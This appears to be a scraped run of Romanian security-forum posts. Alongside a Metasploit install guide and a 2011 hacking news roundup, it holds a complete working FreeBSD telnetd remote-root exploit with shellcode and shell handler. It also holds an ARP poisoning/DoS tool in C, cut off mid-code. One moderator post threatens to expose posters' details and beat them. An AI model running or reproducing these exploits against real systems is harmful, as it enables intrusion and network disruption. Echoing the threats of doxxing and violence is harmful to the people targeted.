Nytro

x86/x64 Instruction Set Reference This is an unofficial online version of the Intel 64 instruction set reference. It provides a list of the available instructions for IA-32 and Intel 64 microprocessors, their assembly mnemonics, encodings, descriptions, pseudo code and the exceptions they can throw. This information is largely compatible with AMD64 processors, except for some minor differences. Link: http://siyobik.info/main/reference

Guide to Installing Metasploit 4 and Armitage on Mac OSX Lion 12-26-11 After many hours of trial and error, I have been able to put together a guide to getting Metasploit 4 and Armitage working properly on Mac OSX. I would also like to give a tremendous amount of credit to BrianCanFixIT @ Faulty Logic. His blog post on setting up Armitage helped me through the missing piece of getting the PostgreSQL database up and running properly. [h=3]Prerequisites[/h] Install XCode (I am running v4.2) [h=3]PostgreSQL Installation[/h] Download and Install PostgreSQL via the free GUI installer. Setup your root PostgreSQL password during installation. Launch the newly installed PGAdmin III application. Connect (double click) on the local PostgreSQL database and enter your root password when prompted. Under the PostgreSQL drop down, right click on “Login Roles”, and select “New Login Role” Set the role name to msfuser. Click on the definition tab, and set the password as msfpassword. Click OK to continue. Next, right click on the databases list, and select “New Database”. Set the name to metasploitdb, and set the owner to msfuser. Press OK, and we’re done. You can close PGAdmin. [h=3]MacPorts[/h] Download and install MacPorts from http://www.macports.org/install.php Good Tip: add “/opt/local” to your spotlight privacy settings to avoid excessive compile times & unnecessary indexing by spotlight. (System Preferences->Spotlight->Privacy->”+”) Quit terminal & relaunch to accept new path settings added by MacPorts [h=3]Install Ruby, RubyGems (PostgreSQL and MsgPack)[/h] # Run as Root sudo bash # Update MacPorts port selfupdate #Install Ruby port install ruby19 +nosuffix # Install PostgreSQL gem connector (64bit Systems) env ARCHFLAGS='-arch x86_64' gem install pg -- --with-opt-include=/Library/PostgreSQL/9.1/include/ --with-opt-lib=/Library/PostgreSQL/9.1/lib/ #Install Ruby Msgpack port install msgpack #Install the gem MSGPACK gem install msgpack # Add Ruby to your path export PATH=/opt/msf3:$PATH # Ensure that /opt/local/bin appears before /usr/bin, else edit ~/.bash_profile file and source it echo $PATH [h=3]Metasploit 4 Installation[/h] # Download Metasploit via Subversion sudo svn co https://www.metasploit.com/svn/framework3/trunk/ /opt/local/msf/ # Create a system link to the msf applications # This is done because including it in your path configuration doesn't seem to work. sudo ln -s /opt/local/msf/msf* /opt/local/bin [h=3]Configure the Metasploit Database[/h] # Create the configuration directory sudo mkdir /opt/local/config # Create/Edit the following file sudo vi /opt/local/config/database.yml # Include the following in your database.yml file # These settings are for the database used by the Metasploit Framework # unstable tree included in this installer, not the commercial editions. # production: adapter: "postgresql" database: "metasploitdb" username: "msfuser" password: "msfpassword" port: 5432 host: "localhost" pool: 256 timeout: 5</code> [h=3]Running Metasploit and Armitage[/h] # Include the database location in your config export MSF_DATABASE_CONFIG=/opt/local/config/database.yml # Launch Metasploit sudo msfrpcd -U msfuser2 -P msfpassword2 -t Msg # Launch Armitage sudo armitage [h=3]Enjoy![/h] Sursa: http://www.nightlion.net/guides/2011/guide-to-installing-metasploit-4-and-armitage-on-mac-osx-lion/

Android App permisions THESE AREN’T THE PERMISSIONS YOU’RE LOOKING FOR Anthony Lineberry David Luke Richardson Tim Wyatt DefCon 18 • Android Internals Overview • Security/Permission Model • Why Ask For Permission When You Can Ask For Forgiveness? • Log-Cat – Our Inside Mole • The Ultimate Permission (Yes, we’re talking about root) • Mitigation Download: https://www.defcon.org/images/defcon-18/dc-18-presentations/Lineberry/DEFCON-18-Lineberry-Not-The-Permissions-You-Are-Looking-For.pdf

Top 10 hacking scandals of 2011 Sonakshi Babbar, Hindustan Times New Delhi, December 27, 2011 As more and more celebrities join the social networking bandwagon, they also become increasingly vulnerable to hacking. From heads of states to Hollywood celebrities, this year saw a series of hacking incidents involving high-profile victims. Check out the most controversial ones. Selena Gomez Selena Gomez's Twitter and Facebook fans woke up to an uncharacteristic post about her boyfriend Justin Bieber. The venomous post screamed "Oh yeah, JUSTIN BIEBER SUCKS!!!!!!!". The teen singer immediately clarified that it was a case of hacking and she had nothing to do with the post. Ashton Kutcher Hollywood star Ashton Kutcher, who used to host the celebrity prank show, Punk'd, got a taste of is medicine his Twitter account @aplusk was hacked. A tweet sent to his followers said, "Ashton, you've been Punk'd. This account is not secure. Dude, where's my SSL?" Kim Kardashian Kim Kardashian went into a panic mode when her Twitter account was hacked by internet pranksters this year. On discovering fake tweets posted by an imposter, the socialite appealed to bosses of the site to help restore the security on her account. Sony PlayStation In one of the biggest data breaches, Sony admitted to an external intrusion which exposed personal information of 77 million PlayStation Network users. The PlayStation maker warned users that the hackers might have access to customers' vital information, including names, birthdates, physical and e-mail addresses, and logins, handles and credit card details. Research in Motion Hackers defaced a website belonging to Blackberry maker Research in Motion soon after the company revealed its plans to support police investigating the London riots. The hackers posted on the blog: "No Blackberry you will NOT assist the police." Blackberry took off the blog briefly and restored it to its original form. Facebook In one of the most shocking security breach incident, around two lakh Facebook accounts were hacked in Bangalore. The users' photos and videos were morphed and the sleazy links mailed to friends and families overnight. Lady Gaga A scam on Lady Gaga's Facebook page fooled many fans into clicking the link to win an iPad. The contest rules and registration were presented as a link to a Blogspot page. "Lady Gaga's new iPad comes out in 3 days! So for the next 72 hours we will be hosting a massive giveaway to all the Mother Monster fans. Sign up and receive your special Lady Gaga edition iPad in time for the Holidays!" hackers posted on her Facebook page. The presence of the fake iPad offer didn't go unnoticed, and was taken down within an hour. Nicolas Sarkozy Hackers played a cruel joke on French President Nicolas Sarkozy when they posted a fake resignation letter from his Facebook page. The post, which went out to more than 350,000 'friends' of the head of the state read like this: "Dear compatriots, given the exceptional circumstances our country is experiencing, I have decided in my spirit and conscience not to run for office again at the end of my mandate in 2012". Yingluck Shinawatra Thailand's Prime Minister, Yingluck Shinawatra, fell victim to the hacking menace when her Twitter account was hacked. Her followers received tweets criticizing her political experience and incompetence. The tweets also suggested that she was her brother's (former Prime Minister - Thaksin Shinawatra) puppet. Fox News While celebrities and popular figures have been the target of hackers, it was media house Fox News who faced their ire in July this year. In a gruesome joke, the hackers tweeted the death of president Obama. Some of the tweets read like this: @BarackObama has just passed. The President is dead. A sad 4th of July, indeed. President Barack Obama is dead." This was followed by more on the same lines claiming that Obama was shot at a restaurant while campaigning. Sursa: Top 10 hacking scandals of 2011 - Hindustan Times

Bixxtonim si HJOCONCEPT95 - ban amandoi. PS: Nu urmaresc topicurile astea.

Sefu, analiza unui malware nu se face in 30 de secunde. Dureaza mult sa analizezi un fisier, si nu am de gand sa stau cate o jumatate de ora sa verific un pogram de cacat, gen stealer/crypter sau ce alte rahaturi cautati voi, pentru ca din moment ce vieniti aici sa descarcati un stealer,crypter, Havij sau altele, e clar ca faceti umbra pamantului degeaba, ca sunteti niste script-kiddies cu aere de hackeri si nu aveti ce cauta aici. Cu alte cuvinte ma doare in cur ca va infectati voi incercand sa descarcati cine stie ce porcarie de program. Daca ati fii seriosi si nu v-ati ocupa cu rahaturi dintr-astea nu ati avea nicio problema. Intre timp esti liber sa iei fiecare program de cacat de aici, din aceasta categorie si sa il analizezi. Te uiti si tu la stringuri pentru inceput, verifici resursele executabilului si vezi daca pe acolo mai este un executabil, verifici sectiunile si vezi daca dai de una suspecta, verifici tabela de importuri, scanezi pe virustotal si anubis pentru inceput, instalezi pe o masina virtuala Wireshark sa vezi daca trimite date, Process Monitor sa vezi ce API-uri apeleaza, Autoruns sa vezi daca se pune la startup, GMER anti-rootkit sa vezi daca dracia are cumva un mic rootkit, apoi mai faci si putin debugging, verifici daca de la Entrypoint face un jmp catre cine stie ce functie, apoi return la Entrypoint, faci snapshot-uri la sistemul de fisiere si Registry si verifici daca se modifica ceva, verifici daca ruleaza intr-un sandbox, dezasamblezi si vezi daca la Main() verifica prezenta unui Sandbox/VM si multe altele. Apoi postezi in topicul respectiv un rezumat complet, spui "Ba ratatule, uite, e infectat pentru ca Entry-point-ul e de fapt un jmp la o un shellcode de download and execute" iar eu sterg link-ul de download, mut topicul la gunoi, iar cel care a postat primeste ban permanent. De asemenea poti face datele descoperite punlice, gen "incearca sa trimita mail la "vasile@gmail.com" iar eu iti pot face publice adresa de mail folosita aici pe forum, sau IP-urile si te anunt din ce oras e. Apoi, daca chiar te-a suparat persoana respectiva, o cautam pe facebook sau alte site-uri, aflam cat putem despre el si mergem si ii futem o mama de bataie si lui si lu' ma-sa ca l-a facut prost si vrea sa ne fure noua parolele de Facebook. Insa cat timp tu ai doar pretentii, iti tii gura si nu mai comentezi aiurea, nu se implica nimeni sa verifice programele de cacat postate aici, poate daca era vorba de un program serios da, dar Havij? Daca esti bun nu ai nevoie de asa ceva, ai nevoie doar de un browser, insa script-kiddie fiind, meriti sa executi toate programele infectat pentru ca nici nu stii ce e o masina virtuala sau macar un sandbox.

Telnetd encrypt_keyid: Remote Root function pointer overwrite /*************************************************************************** * telnetd-encrypt_keyid.c * * Mon Dec 26 20:37:05 CET 2011 * Copyright 2011 Jaime Penalba Estebanez (NighterMan) * * nighterman@painsec.com - jpenalbae@gmail.com * Credits to batchdrake as always * * ______ __ ________ * / __ / /_/ / _____/ * / /_/ /______________\ \_____________ * / ___ / __ / / __ / \ \/ _ \/ __/ * / / / /_/ / / / / /___/ / __/ /__ * ____/__/____\__,_/_/_/ /_/______/\___/\____/____ * * ****************************************************************************/ /* * * Usage: * * $ gcc exploit.c -o exploit * * $ ./exploit 127.0.0.1 23 1 * [<] Succes reading intial server request 3 bytes * [>] Telnet initial encryption mode and IV sent * [<] Server response: 8 bytes read * [>] First payload to overwrite function pointer sent * [<] Server response: 6 bytes read * [>] Second payload to triger the function pointer * [*] got shell? * uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <errno.h> #include <sys/time.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #define MAXKEYLEN 64-1 struct key_info { unsigned char keyid[MAXKEYLEN]; unsigned char keylen[4]; unsigned char dir[4]; unsigned char modep[4]; unsigned char getcrypt[4]; }; static unsigned char shellcode[] = "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\xb0\x17" // mov $0x17,%al "\x50" // push %eax "\xcd\x80" // int $0x80 "\x50" // push %eax "\x68\x6e\x2f\x73\x68" // push $0x68732f6e "\x68\x2f\x2f\x62\x69" // push $0x69622f2f "\x89\xe3" // mov %esp,%ebx "\x50" // push %eax "\x54" // push %esp "\x53" // push %ebx "\x50" // push %eax "\xb0\x3b" // mov $0x3b,%al "\xcd\x80"; // int $0x80 static unsigned char tnet_init_enc[] = "\xff\xfa\x26\x00\x01\x01\x12\x13" "\x14\x15\x16\x17\x18\x19\xff\xf0"; static unsigned char tnet_option_enc_keyid[] = "\xff\xfa\x26\x07"; static unsigned char tnet_end_suboption[] = "\xff\xf0"; /* * shell(): semi-interactive shell hack */ static void shell(int fd) { fd_set fds; char tmp[128]; int n; /* check uid */ write(fd, "id\n", 3); /* semi-interactive shell */ for ( { FD_ZERO(&fds); FD_SET(fd, &fds); FD_SET(0, &fds); if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) { perror("select"); break; } /* read from fd and write to stdout */ if (FD_ISSET(fd, &fds)) { if ((n = read(fd, tmp, sizeof(tmp))) < 0) { fprintf(stderr, "Goodbye...\n"); break; } if (write(1, tmp, n) < 0) { perror("write"); break; } } /* read from stdin and write to fd */ if (FD_ISSET(0, &fds)) { if ((n = read(0, tmp, sizeof(tmp))) < 0) { perror("read"); break; } if (write(fd, tmp, n) < 0) { perror("write"); break; } } } close(fd); exit(1); } static int open_connection(in_addr_t dip, int dport) { int pconn; struct sockaddr_in cdata; struct timeval timeout; /* timeout.tv_sec = _opts.timeout; */ timeout.tv_sec = 8; timeout.tv_usec = 0; /* Set socket options and create it */ cdata.sin_addr.s_addr = dip; cdata.sin_port = htons(dport); cdata.sin_family = AF_INET; pconn = socket(AF_INET, SOCK_STREAM, 0); if( pconn < 0 ) { printf("Socket error: %i\n", pconn); printf("Err message: %s\n", strerror(errno)); exit(-1); } /* Set socket timeout */ if ( setsockopt(pconn, SOL_SOCKET, SO_RCVTIMEO, (void *)&timeout, sizeof(struct timeval)) != 0) { perror("setsockopt SO_RCVTIMEO: "); exit(1); } /* Set socket options */ if ( setsockopt(pconn, SOL_SOCKET, SO_SNDTIMEO, (void *)&timeout, sizeof(struct timeval)) != 0) { perror("setsockopt SO_SNDTIMEO: "); exit(1); } /* Make connection */ if (connect(pconn,(struct sockaddr *) &cdata, sizeof(cdata)) != 0) { close(pconn); return -1; } return pconn; } static void usage(char *arg) { printf("Telnetd encrypt_keyid exploit for FreeBSD\n"); printf("NighterMan <nighterman@painsec.com>\n\n"); printf("Usage: %s [ip] [port] [target]\n", arg); printf("Available Targets:\n"); printf(" - 1: FreeBSD 8.0 & 8.1\n"); printf(" - 2: FreeBSD 8.2\n\n"); } int main(int argc, char *argv[]) { /* Payload Size */ int psize = (sizeof(struct key_info) + sizeof(tnet_option_enc_keyid) + sizeof(tnet_end_suboption)); struct key_info bad_struct; unsigned char payload[psize]; unsigned char readbuf[256]; int ret; int conn; int offset = 0; if ( argc != 4) { usage(argv[0]); return -1; } /* Fill the structure */ memset(&bad_struct, 0x90, sizeof(struct key_info)); memcpy(&bad_struct.keyid[20], shellcode, sizeof(shellcode)); memcpy(bad_struct.keylen, "DEAD", 4); memcpy(bad_struct.dir, "BEEF", 4); memcpy(bad_struct.modep, "\x6c\x6f\x05\x08", 4); /* Readable address */ /* Shellcode address (function pointer overwrite) */ switch (atoi(argv[3])) { case 1: memcpy(bad_struct.getcrypt, "\xa6\xee\x05\x08", 4); break; case 2: memcpy(bad_struct.getcrypt, "\xed\xee\x05\x08", 4); break; default: printf("Bad target\n"); return -1; break; } /* Prepare the payload with the overflow */ memcpy(payload, tnet_option_enc_keyid, sizeof(tnet_option_enc_keyid)); offset += sizeof(tnet_option_enc_keyid); memcpy(&payload[offset], &bad_struct, sizeof(bad_struct)); offset += sizeof(bad_struct); memcpy(&payload[offset], tnet_end_suboption, sizeof(tnet_end_suboption)); /* Open the connection */ conn = open_connection(inet_addr(argv[1]), atoi(argv[2])); if (conn == -1) { printf("Error connecting: %i\n", errno); return -1; } /* Read initial server request */ ret = read(conn, readbuf, 256); printf("[<] Succes reading intial server request %i bytes\n", ret); /* Send encryption and IV */ ret = write(conn, tnet_init_enc, sizeof(tnet_init_enc)); if (ret != sizeof(tnet_init_enc)) { printf("Error sending init encryption: %i\n", ret); return -1; } printf("[>] Telnet initial encryption mode and IV sent\n"); /* Read response */ ret = read(conn, readbuf, 256); printf("[<] Server response: %i bytes read\n", ret); /* Send the first payload with the overflow */ ret = write(conn, payload, psize); if (ret != psize) { printf("Error sending payload first time\n"); return -1; } printf("[>] First payload to overwrite function pointer sent\n"); /* Read Response */ ret = read(conn, readbuf, 256); printf("[<] Server response: %i bytes read\n", ret); /* Send the payload again to tigger the function overwrite */ ret = write(conn, payload, psize); if (ret != psize) { printf("Error sending payload second time\n"); return -1; } printf("[>] Second payload to triger the function pointer\n"); /* Start the semi interactive shell */ printf(" [*] got shell?\n"); shell(conn); return 0; } Citeam inainte de Craciun despre aceasta problema, se pare ca a aparut un exploit pentru telnetd. Sursa: Telnetd encrypt_keyid: Remote Root function pointer overwrite More info: http://thexploit.com/secdev/a-textbook-buffer-overflow-a-look-at-the-freebsd-telnetd-code/

Parolele nu sunt de la mail-uri ci de la site-ul de unde au fost "preluate". Totusi exista sanse ca unele persoane sa foloseasca aceeasi parola in mai multe locuri.

Partea cu "furatul" din framework-uri nu e legata tocmai de furat, ci mai mult de invatat. Acele framework-uri de obicei sunt scrise pe persoane cu multi ani de experienta in domeniu, si de multe ori sunt surse bune de documentatie, surse din care poti invata multe: - optimizari de cod - aranjare si documentare cod - scriere profesionala de cod

Ultimele update-uri: [h=6]Open Penetration Testing Bookmarks Collection Vulnerability Database Pentagon approved Android to be used by DoD officials STRATFOR leaked accounts (10257 passwords recovered) Lynis Auditing Tool 1.3.0 Ubertooth ARP Cache Poisoning Monkey || ARP Poisoning tool Network Destroyer ARP TCP Flooder [Rezolvare] SQL Injection Control Remote System [SQLi] Intel MySQL 5.5.8 Remote Denial Of Service (DOS) Lighttpd 1.4.30 / 1.5 Denial Of Service[/h] [h=6]The Perfect Server - CentOS 6.1 x86_64 With nginx Execute Binary In The Alternate Data Stream [Unix] Install Freebsd 8 in 8 minutes False SQL Injection and Advanced Blind SQL Injection Simple Virtual Machine Untethered jailbreak demonstrated for iOS 5, iOS 5.1 Kaspersky Anti-Virus and Internet Security 2012 Vulnerable to Hackers China Software Developer Network (CSDN) 6 Million user data Leaked The Crypter Blueprint[/h] [h=6]Oracle Solaris 11 Kernel Source Leaked HTML5 web security Metasploit on Amazon Kindle Securitytube Metasploit Framework Expert ( Armitage ) Probably the Best Free Security List in the World A simple HTML tag will crash 64-bit Windows 7 Excel formula injection in Google Docs CSS - The sexy assasin Backdoor in Android for No-Permissions Reverse Shell[/h] Daca sunteti interesati de topicurile utile de pe forum: Like: Romanian Security Team | Facebook http://www.facebook.com/rstforum

Depinde ce vrei sa spui prin asta. Daca vrei sa inveti programare doar la un nivel de baza, apoi te apuci sa studiezi framework-uri DA, nu e tocmai ok, in sensul ca nu o sa intelegi ce fac mai exact acele framework-uri, cum functioneaza. Daca in schinb inveti bine programare, si observi cu ochii tai ca poti face tu ceea ce face un framework o sa privesti altfel situatie, o sa incepi sa iei in considerare optimizarile si anume ca de fapt nu ai nevoie de tot acel framework si ca daca implementezi tu o parte din framework o poti implementa mai optim pentru proiectul tau. Apoi, din moment ce ai stii sa faci ceea ce face acel framework, nu va fi nicio problema sa studiezi codul acelui framework, sa iei cateva idei, sau chiar bucati de cod, pentru ca le-ai intelege. Daca din start, cu o linie de cod, faci ceea ce ar face 1000 de linii de cod, habar nu ai ce se intampla de fapt si nu ai nici accesul de care ai avea nevoie, in caz ca treci direct pe framework-uri.

ARP Cache Poisoning /** I do very much enjoy this raw socket network programming. This code could and probably should be optimized in several ways, but I tried. Anyway, this code is for testing and educational purposes only, yadda yadda yadda... The program: Exploits the Address Resolution Protocol (legacy exploit, I know) on the whole subnet. Just read the code if you want to know more. If you can't read it, then learn how it works before thinking about using it. Reasons for compilation/runtime errors: (may be some dumb reasons but you never know...) - misconfiguration with your network (/proc/net/route and your NIC need to be configured) - you aren't root - you aren't even running Linux - missing header files (O_o) - you are an idiot Tested on a private network using Ubuntu Linux on a network with two machines running Windows XP and Slackware Linux **/ /** And the Code: **/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <sys/select.h> #include <features.h> #include <sys/types.h> #include <net/if.h> #include <net/ethernet.h> #include <net/if_arp.h> #include <netinet/in.h> #include <netinet/ether.h> #include <linux/if_packet.h> #include <linux/if_ether.h> #include <linux/ip.h> #include <linux/icmp.h> #include <unistd.h> #include <arpa/inet.h> #include <errno.h> #include <netdb.h> #include <time.h> #include <signal.h> #define BROADCAST "ff:ff:ff:ff:ff:ff" #define EMPTY "00:00:00:00:00:00" #define SPOOF_MAC "00:DE:AD:BE:EF:11" /* 14 byte Ethernet Protocol header definition */ typedef struct EthernetHeader { unsigned char destination[6]; unsigned char source[6]; unsigned short protocol; } EthernetHeader; /* 28 byte ARP header */ typedef struct ArpHeader { unsigned short hardware_type; unsigned short protocol_type; unsigned char hard_addr_len; unsigned char prot_addr_len; unsigned short opcode; unsigned char source_hardware[6]; unsigned int source_ip; unsigned char dest_hardware[6]; unsigned int dest_ip; }__attribute__((__packed__)) ArpHeader; /* a data structure to hold whatever information you want to keep track of about each host */ typedef struct RemoteHost { unsigned char mac[6]; unsigned int ip; } RemoteHost; int childnotdead; /* global variables for SIGNAL access, since you can't really pass any args to a signal handler... */ unsigned char orig_mac[6]; struct ifreq ifr_fix; int sockfd_fix; void createEthHeader(EthernetHeader *ethernet_header, unsigned char *src_mac, unsigned char *dest_mac, int proto) { /* set up 14 byte Ethernet header */ memcpy(ethernet_header->source, src_mac, 6); memcpy(ethernet_header->destination, dest_mac, 6); ethernet_header->protocol = htons(proto); } void createArpHeader(ArpHeader *ArpHeader, unsigned char *src_mac, unsigned char *dst_mac, unsigned int src_ip, unsigned int dst_ip, unsigned int opCode) { /* set up 28 byte ARP header */ ArpHeader->hardware_type = htons(ARPHRD_ETHER); ArpHeader->protocol_type = htons(ETHERTYPE_IP); ArpHeader->hard_addr_len = 6; ArpHeader->prot_addr_len = 4; ArpHeader->opcode = htons(opCode); memcpy(ArpHeader->source_hardware, src_mac, 6); ArpHeader->source_ip = src_ip; memcpy(ArpHeader->dest_hardware, dst_mac, 6); ArpHeader->dest_ip = dst_ip; } /* byte array to null terminated string, any other method of printing the MAC address was annoying */ static char * mactos(unsigned char *addr) { static char buffer[256]; sprintf(buffer,"%02x:%02x:%02x:%02x:%02x:%02x",addr[0],addr[1],addr[2],addr[3],addr[4],addr[5]); return buffer; } /* unsigned int to string, easier way to manage different IP address formats IMHO */ static char * uitos(unsigned int ip) { static char bytes[256]; sprintf(bytes, "%d.%d.%d.%d", (ip >> 24) & 0xFF, (ip >> 16) & 0xFF, (ip >> 8) & 0xFF, (ip >> 0) & 0xFF); return bytes; } /* returns a raw socket file descriptor that listens for packets on the OSI Layer 2 level */ int createRawSockFd(int protocol) { int sockfd; if ((sockfd = socket(PF_PACKET, SOCK_RAW, protocol)) < 0) { perror("socket"); exit(-1); } return sockfd; } /* binds the raw socket FD to the device given as argument one */ int bindSock(char *device_name, int sockfd, int protocol) { struct sockaddr_ll sll; struct ifreq ifr; bzero(&sll,sizeof(sll)); bzero(&ifr,sizeof(ifr)); /* get the interface index */ strncpy((char *)ifr.ifr_name, device_name, IFNAMSIZ); if ((ioctl(sockfd, SIOCGIFINDEX, &ifr))==-1) { printf("Could not get the interface index.\n"); exit(-1); } /* bind raw socket to the interface */ sll.sll_family=AF_PACKET; sll.sll_ifindex=ifr.ifr_ifindex; sll.sll_protocol=htons(protocol); if ((bind(sockfd, (struct sockaddr *)&sll, sizeof(sll)))==-1) { printf("bind failed, couldn't bind raw socket to interface.\n"); exit(1); } return 1; } /* really easy to send packets, just write it out to the socket */ int sendPacket(int sockfd, unsigned char *packet, int packetSize) { int bytes = 0; if ((bytes = write(sockfd, packet, packetSize)) != packetSize) { fprintf(stderr, "could only send %d\\%d bytes of data onto wire\n", bytes, packetSize); return 0; } return 1; } void printPacket(unsigned char *packet, int packet_len) { int i; for (i = 0; i < packet_len; i+=2) { if (!(i % 16)) printf("\n"); printf("%02x%02x ", packet[i], packet[i+1]); } printf("\n\n"); } void strip_newline(char *str) { int i; for (i=0; i<strlen(str); i++) if (str[i] == '\n') str[i] = '\0'; } void handler(int sig) { childnotdead = 0; } /* makes sure that I don't get duplicate addresses, my own, or the gateway */ int validTarget(unsigned int ip, unsigned int localip, unsigned int gatewayip, RemoteHost *hostlist, int curr) { int i; if ((ip == localip) || (ip == gatewayip)) return 0; for (i = 0; i < curr; i++) if (ip == hostlist[i].ip) return 0; return 1; } void banner( void ) { printf("\nARP DoS by suid\n\n"); } void fixMAC(int signum) { printf("Setting MAC address back to %s\n", mactos(orig_mac)); memcpy(&ifr_fix.ifr_hwaddr.sa_data, orig_mac, 6); if (ioctl(sockfd_fix, SIOCSIFHWADDR, &ifr_fix) < 0) { perror("SIOCSIFHWADDR"); exit(-1); } exit(signum); } static char * getAns(char *q) { char *ans = (char *)malloc(sizeof(char)*10); printf("%s", q); fgets(ans, sizeof(ans)-1, stdin); strip_newline(ans); return ans; } void removeHosts(struct RemoteHost *host_list, int numhosts) { char buff[1024], *token; int *hosts = malloc(numhosts), i = 1, j, k = 0; RemoteHost *new_host_list; int newNumHosts; printf("Format: <host0> <host1> <host2> ... <hostn>\n"); fgets(buff, sizeof(buff)-1, stdin); token = strtok(buff, " "); hosts[0] = atoi(token); while ((token = strtok(NULL, " ")) != NULL) { hosts[i] = atoi(token); i++; } newNumHosts = numhosts - i; printf("Now removing...\nHosts: "); for (j = 0; j < i; j++) printf("%s\n", uitos(ntohl(host_list[hosts[j]].ip))); printf("\n"); for (j = 0; j < i; j++) host_list[hosts[j]].ip = 0; new_host_list = (RemoteHost *)malloc(sizeof(RemoteHost)*newNumHosts); for (i = k; i < numhosts; i++) if (host_list[i].ip == 0) continue; else { new_host_list[k] = host_list[i]; k++; } host_list = new_host_list; } int main(int argc, char **argv) { EthernetHeader *arp_ethernet_header, *ethernet_header_reply; ArpHeader *arp_header, *arp_header_reply; unsigned int device_in_addr, gateway_in_addr, netmask, subnet, *remote_hosts, numhosts; int sockfd, i, zeros, numIfs, ArpPacketSize, pid, bytes, hosts_online; unsigned char *ArpPacket, device_mac[6], gateway_mac[6], packet_recv[2048]; char buff[1024], pbuff[1024], *token, *device_name, answer[3]; FILE *pipe; struct ifreq *ifr, *ifr_item; struct ifreq ifr_dat; struct ifconf ifc; struct sockaddr_in sin, *sin2; struct arpreq areq; struct timeval tv; struct in_addr ipaddr; fd_set readfds; RemoteHost *remote_host_info; banner(); /* make sure user has root for raw sockets */ if (getuid() != 0) { fprintf(stderr, "This program requires root priviledges to execute!\n"); exit(-1); } signal(SIGINT, fixMAC); sockfd = createRawSockFd(ETH_P_ALL); sockfd_fix = sockfd; /** GET NIC NAME, NIC IP, NIC MAC, GATEWAY IP, GATEWAY MAC, SUBNET MASK (NUMBER OF HOSTS ON SUBNET) **/ if ((pipe = popen("cat /proc/net/route", "r")) == NULL) { fprintf(stderr, "pipe to cat route failed.\n"); exit(-1); } while (fgets(pbuff, sizeof(pbuff), pipe) != NULL) { token = strtok(pbuff, "\t\n "); device_name = token; while (token != NULL) { token = strtok(NULL, "\t\n "); if (!strcmp(token, "00000000")) { token = strtok(NULL, "\t\n "); gateway_in_addr = strtol(token, NULL, 16); break; } else { break; } token = strtok(NULL, "\t\n "); } } /* bind socket to this default network interface */ bindSock(device_name, sockfd, ETH_P_ALL); /* get list of network address assigned NIC's */ ifc.ifc_len = sizeof(buff); ifc.ifc_buf = buff; if (ioctl(sockfd, SIOCGIFCONF, &ifc) < 0) { perror("SIOCGIFCONF"); exit(-1); } /* find NIC with default route, get NIC IP address */ ifr = ifc.ifc_req; numIfs = ifc.ifc_len / sizeof(struct ifreq); for (i = 0; i < numIfs; i++) { ifr_item = &ifr[i]; if (!strcmp(ifr_item->ifr_name, device_name)) device_in_addr = (((struct sockaddr_in *)&ifr_item->ifr_addr)->sin_addr).s_addr; } /* get NIC/GATEWAY MAC address */ strncpy((char *)ifr_dat.ifr_name, device_name, IFNAMSIZ); if (ioctl(sockfd, SIOCGIFHWADDR, &ifr_dat) < 0) { perror("SIOCGIFHWADDR"); exit(-1); } memcpy(orig_mac, ifr_dat.ifr_hwaddr.sa_data, 6); /* this is SO ugly but meh, it works */ memset(&areq, 0, sizeof(areq)); sin2 = (struct sockaddr_in *)&areq.arp_pa; sin2->sin_family = AF_INET; ipaddr.s_addr = gateway_in_addr; sin2->sin_addr = ipaddr; sin2 = (struct sockaddr_in *)&areq.arp_ha; sin2->sin_family = ARPHRD_ETHER; strncpy(areq.arp_dev, device_name, 15); if (ioctl(sockfd, SIOCGARP, (caddr_t)&areq) == -1) { perror("SIOCGARP: check your ARP table"); exit(-1); } memcpy(gateway_mac, (&areq.arp_ha)->sa_data, 6); memcpy(&ifr_dat.ifr_hwaddr.sa_data,(unsigned char *)ether_aton(SPOOF_MAC),6); if (ioctl(sockfd, SIOCSIFHWADDR, &ifr_dat) < 0) { perror("SIOCSIFHWADDR"); exit(-1); } memcpy(device_mac, ifr_dat.ifr_hwaddr.sa_data, 6); ifr_fix = ifr_dat; /* get subnet mask and network address to calculate number of hosts */ if (ioctl(sockfd, SIOCGIFNETMASK, &ifr_dat) < 0) { perror("SIOCGIFNETMASK"); exit(-1); } memcpy(&sin, &ifr_dat.ifr_addr, sizeof(struct sockaddr)); netmask = sin.sin_addr.s_addr; subnet = (netmask & device_in_addr); for (i=0; i<32; i++) if (ntohl(netmask) & (1<<i)) break; zeros = i; numhosts = (1<<zeros); /* fill host_addrs with possible assigned addresses, skip 0x00?????? 0xFF?????? */ remote_hosts = (unsigned int *)malloc(sizeof(unsigned int)*(numhosts)); for (i = 0; i < numhosts; i++) remote_hosts[i] = (ntohl(subnet) | i); /** END NETWORK INFORMATION QUERIES **/ /** CREATE DEFAULT ARP PACKET **/ /* create memory segment for ARP packet header */ ArpPacketSize = sizeof(EthernetHeader) + sizeof(ArpHeader); ArpPacket = (unsigned char *)malloc(ArpPacketSize); arp_ethernet_header = (EthernetHeader *)ArpPacket; arp_header = (ArpHeader *)(ArpPacket + sizeof(EthernetHeader)); /* fill in ARP Request packet header */ createArpHeader(arp_header, device_mac, (ether_aton(EMPTY))->ether_addr_octet, device_in_addr, 0, ARPOP_REQUEST); /* fill in ARP packet Ethernet header */ createEthHeader(arp_ethernet_header, device_mac, (ether_aton(BROADCAST))->ether_addr_octet, ETHERTYPE_ARP); /** END DEFAULT PACKETS **/ /** CREATE LIST OF HOSTS' IP -> MAC ADDRESSES VIA ARP REQUEST **/ /* use two different processes to handle sending ARP Requests and receiving ARP Replies both for increased speed and reliability */ setbuf(stdout, NULL); printf("\n"); if ((pid = fork()) == 0) { /* send the ARP Requests out to all hosts in remote_hosts */ for (i = 0; i < numhosts; i++) { if (ntohl(remote_hosts[i]) == device_in_addr) continue; arp_header->dest_ip = htonl(remote_hosts[i]); if (!sendPacket(sockfd, ArpPacket, ArpPacketSize)) { perror(" [*] Packet send failed!\n"); exit(-1); } /* some networks create Ethernet collisions with dropped packets as a result so slow it down a small amount */ usleep(100000); } sleep(10); exit(1); } else { /* listen for ARP Replies from the hosts on the network and record the MAC addresses */ remote_host_info = malloc(sizeof(RemoteHost) * numhosts); signal(SIGCHLD, handler); childnotdead = 1; printf("Gathering MAC 